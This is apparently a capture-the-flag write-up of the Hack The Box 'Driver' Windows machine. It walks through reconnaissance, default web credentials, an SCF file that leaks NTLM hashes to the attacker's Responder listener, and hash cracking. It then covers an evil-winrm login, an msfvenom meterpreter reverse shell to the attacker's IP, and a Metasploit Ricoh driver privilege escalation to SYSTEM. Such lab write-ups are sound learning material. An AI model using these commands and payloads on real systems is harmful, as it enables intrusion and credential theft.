Driver
Driver
Reconnaissance
Port Discovery
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
sudo nmap -PN -sC -sV -oN driver 10.10.11.106
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-14 15:58 PKT
Nmap scan report for 10.10.11.106
Host is up (0.12s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-08-14T17:34:34
|_ start_date: 2025-08-14T17:23:03
|_clock-skew: mean: 6h35m42s, deviation: 0s, median: 6h35m42s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.94 seconds
We have a port 80 with a Microsoft IIS web server. Port 135 is open for MSRPC, port 445 for SMB, and port 5985 for windows RM.
Web Enumeration
On visiting the site, we are prompted for creds.
admin:admin works.
Everything takes us to firmware update page.
I tried submitting a png and it was accepted.
Fingerprinting
1
2
whatweb 10.10.11.106
http://10.10.11.106 [401 Unauthorized] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.10.11.106], Microsoft-IIS[10.0], PHP[7.3.25], WWW-Authenticate[MFP Firmware Update Center. Please enter password for admin][Basic], X-Powered-By[PHP/7.3.25]
I tried uploading multiple files, but the main task right now is to figure out where the file share is? How would we trigger it without knowing the path? However even directory busting didn’t yield any results. What we are left with is the Shell Command File attack.
Foothold
Shell Command File Attack (scf)
SCF files don’t run arbitrary code. However, Windows Explorer fetches any .ico files automatically. Just browsing to the folder with an SCF file is enough.
Scenario:
Target allows uploading .scf files into a shared folder or document management system that employees browse.
- Attacker uploads malicious.scf with IconFile=\attacker-ip\share\icon.ico.
- A victim browses that directory in Windows Explorer.
- Windows tries to load the icon over SMB, sending the victim’s NTLM credentials.
- Attacker captures and reuses those creds.
Let’s craft an SCF file first:
1
2
3
4
5
6
cat wow.scf
[Shell]
Command=2
IconFile=\\10.10.16.30\share\test
[Taskbar]
Command=ToggleDesktop
Let’s run a responder server to capture the NTLM hashes. Ensure smb server is running:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.6.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Uploading the SCF file immediately triggers the SMB request and we get the hash:
1
2
3
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:983080659d696e67:4CDB5A8DB313783F514AF1A0558492B1:0101000000000000802B25A0440DDC012069910971DBF5AF0000000002000800520030004D005A0001001E00570049004E002D0050004200440058004D0050003700510039005A00560004003400570049004E002D0050004200440058004D0050003700510039005A0056002E00520030004D005A002E004C004F00430041004C0003001400520030004D005A002E004C004F00430041004C0005001400520030004D005A002E004C004F00430041004C0007000800802B25A0440DDC0106000400020000000800300030000000000000000000000000200000AF6FFF6F18E3FD01EC716F1C95790950E4EF78E0B2933A9781EC6B7B2CDEEC620A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0033003000000000000000000000000000
We save the entire challenge-response and crack it with hashcat:
1
TONY::DRIVER:983080659d696e67:4cdb5a8db313783f514af1a0558492b1:0101000000000000802b25a0440ddc012069910971dbf5af0000000002000800520030004d005a0001001e00570049004e002d0050004200440058004d0050003700510039005a00560004003400570049004e002d0050004200440058004d0050003700510039005a0056002e00520030004d005a002e004c004f00430041004c0003001400520030004d005a002e004c004f00430041004c0005001400520030004d005a002e004c004f00430041004c0007000800802b25a0440ddc0106000400020000000800300030000000000000000000000000200000af6fff6f18e3fd01ec716f1c95790950e4ef78e0b2933a9781ec6b7b2cdeec620a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0033003000000000000000000000000000:liltony
tony:liltony.
Let’s try evil-winrm and we are in:
1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 10.10.11.106 -u tony -p liltony
zsh: /usr/local/bin/evil-winrm: bad interpreter: /usr/bin/ruby3.1: no such file or directory
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
Privilege Escalation
Let’s start by running winpeas.
1
2
PS history file: C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 134B
1
2
3
4
5
*Evil-WinRM* PS C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline> type ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'
ping 1.1.1.1
ping 1.1.1.1
Let’s see what the driver is, and if it comes with any vulnerabilities.
There are ton of privilege escalation vulnerabilities associated with Ricoh printers. We have a CVE-2019-19363.
It is a metasploit module.
We have full permissions on the driver directory:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
*Evil-WinRM* PS C:\ProgramData\RICOH_DRV> icacls C:\ProgramData\RICOH_DRV
C:\ProgramData\RICOH_DRV Everyone:(OI)(CI)(F)
*Evil-WinRM* PS C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz> icacls "C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz"
C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz Everyone:(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz> dir -Force
Directory: C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/11/2021 7:21 AM help
-a---- 7/2/2019 3:58 PM 176128 borderline.dll
-a---- 7/2/2019 3:58 PM 443392 colorbalance.dll
-a---- 7/2/2019 3:58 PM 531456 headerfooter.dll
-a---- 7/2/2019 3:58 PM 2229760 jobhook.dll
-a---- 7/2/2019 3:58 PM 407552 outputimage.dll
-a---- 7/2/2019 3:58 PM 3745792 overlaywatermark.dll
-a---- 7/2/2019 3:58 PM 3960832 popup.dll
-a---- 7/2/2019 3:58 PM 400384 printercopyguardpreview.dll
-a---- 7/2/2019 3:58 PM 401920 printerpreventioncopypatternpreview.dll
-a---- 7/2/2019 3:58 PM 291328 secretnumberingpreview.dll
-a---- 7/2/2019 3:58 PM 5237760 watermark.dll
-a---- 7/2/2019 3:58 PM 321536 watermarkpreview.dll
There’s a POC available as well:
Exploiting it was very unstable for me. I tried different metasploit payloads.
Metasploit
1
2
3
4
5
6
7
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.30 LPORT=4444 -f exe -o msf.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: msf.exe
At the same time start:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
msfconsole
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.16.30
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.30:4444
[*] Sending stage (203846 bytes) to 10.10.11.106
[*] Meterpreter session 2 opened (10.10.16.30:4444 -> 10.10.11.106:49419) at 2025-08-14 19:35:36 +0500
meterpreter > getuid
Server username: DRIVER\tony
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > search ricoh
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/ftp/ricoh_dl_bof 2012-03-01 normal Yes Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
1 exploit/windows/local/ricoh_driver_privesc 2020-01-22 normal Yes Ricoh Driver Privilege Escalation
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/ricoh_driver_privesc
msf6 exploit(multi/handler) > use 1
msf6 exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ricoh_driver_privesc) > set LHOST tun0
LHOST => 10.10.16.30
msf6 exploit(windows/local/ricoh_driver_privesc) > set session 2
session => 2
msf6 exploit(windows/local/ricoh_driver_privesc) > run
[*] Started reverse TCP handler on 10.10.16.30:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer XAAuzA...
^C[-] Exploit failed [user-interrupt]: Interrupt
[*] Deleting printer XAAuzA
^C[*] Deleting printer XAAuzA
^C[-] run: Interrupted
It was stuck for some reason. I then found out that we will have to migrate processes.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
msf6 exploit(windows/local/ricoh_driver_privesc) > sessions 2
[*] Starting interaction with 2...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Proce
ss]
4 0 System
272 4 smss.exe
348 340 csrss.exe
456 448 csrss.exe
464 340 wininit.exe
508 448 winlogon.exe
572 464 services.exe
580 464 lsass.exe
660 572 svchost.exe
708 572 svchost.exe
756 952 WUDFHost.exe
804 508 dwm.exe
816 572 svchost.exe
868 572 svchost.exe
944 572 svchost.exe
952 572 svchost.exe
968 660 explorer.exe x64 1 DRIVER\tony C:\Windows\explorer.exe
1004 572 svchost.exe
1036 572 svchost.exe
1280 572 spoolsv.exe
1304 572 sedsvc.exe
1376 572 svchost.exe
1540 572 svchost.exe
1560 572 svchost.exe
1592 572 svchost.exe
1600 572 VGAuthService
.exe
1664 572 vm3dservice.e
xe
1712 2884 conhost.exe x64 1 DRIVER\tony C:\Windows\System32\conhost.ex
e
1724 572 svchost.exe
1736 572 vmtoolsd.exe
1984 1664 vm3dservice.e
xe
2120 572 svchost.exe x64 1 DRIVER\tony C:\Windows\System32\svchost.ex
e
2148 2852 SearchFilterH
ost.exe
2228 572 dllhost.exe
2424 572 msdtc.exe
2488 660 WmiPrvSE.exe
2680 572 svchost.exe
2724 816 sihost.exe x64 1 DRIVER\tony C:\Windows\System32\sihost.exe
2776 660 explorer.exe x64 1 DRIVER\tony C:\Windows\explorer.exe
2832 816 taskhostw.exe x64 1 DRIVER\tony C:\Windows\System32\taskhostw.
exe
2848 3164 msf.exe x64 0 DRIVER\tony C:\Users\tony\Documents\msf.ex
e
2852 572 SearchIndexer
.exe
2884 816 cmd.exe x64 1 DRIVER\tony C:\Windows\System32\cmd.exe
2956 572 svchost.exe
3068 2852 SearchProtoco
lHost.exe
3164 660 wsmprovhost.e x64 0 DRIVER\tony C:\Windows\System32\wsmprovhos
xe t.exe
3180 3156 explorer.exe x64 1 DRIVER\tony C:\Windows\explorer.exe
3240 660 RuntimeBroker x64 1 DRIVER\tony C:\Windows\System32\RuntimeBro
.exe ker.exe
3544 2848 cmd.exe x64 0 DRIVER\tony C:\Windows\System32\cmd.exe
3564 660 ShellExperien x64 1 DRIVER\tony C:\Windows\SystemApps\ShellExp
ceHost.exe erienceHost_cw5n1h2txyewy\Shel
lExperienceHost.exe
3652 660 SearchUI.exe x64 1 DRIVER\tony C:\Windows\SystemApps\Microsof
t.Windows.Cortana_cw5n1h2txyew
y\SearchUI.exe
3684 2852 SearchProtoco x64 1 DRIVER\tony C:\Windows\System32\SearchProt
lHost.exe ocolHost.exe
3896 660 explorer.exe x64 1 DRIVER\tony C:\Windows\explorer.exe
4192 660 WmiPrvSE.exe
4592 2884 PING.EXE x64 1 DRIVER\tony C:\Windows\System32\PING.EXE
4596 3180 vmtoolsd.exe x64 1 DRIVER\tony C:\Program Files\VMware\VMware
Tools\vmtoolsd.exe
4644 3180 OneDrive.exe x86 1 DRIVER\tony C:\Users\tony\AppData\Local\Mi
crosoft\OneDrive\OneDrive.exe
4728 572 svchost.exe
4952 3544 conhost.exe x64 0 DRIVER\tony C:\Windows\System32\conhost.ex
e
meterpreter > migrate -N explorer.exe
[*] Migrating from 2848 to 3180...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 2...
Now I had to run the payload 2 times again:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf6 exploit(windows/local/ricoh_driver_privesc) > run
[*] Started reverse TCP handler on 10.10.16.30:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer eITDRmA...
[*] Deleting printer eITDRmA
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ricoh_driver_privesc) > run
[*] Started reverse TCP handler on 10.10.16.30:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer ZyIXWTt...
[*] Sending stage (203846 bytes) to 10.10.11.106
[+] Deleted C:\Users\tony\AppData\Local\Temp\eIweTu.bat
[+] Deleted C:\Users\tony\AppData\Local\Temp\headerfooter.dll
[*] Meterpreter session 3 opened (10.10.16.30:4444 -> 10.10.11.106:49420) at 2025-08-14 19:45:00 +0500
[*] Deleting printer ZyIXWTt
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
This post is licensed under CC BY 4.0 by the author.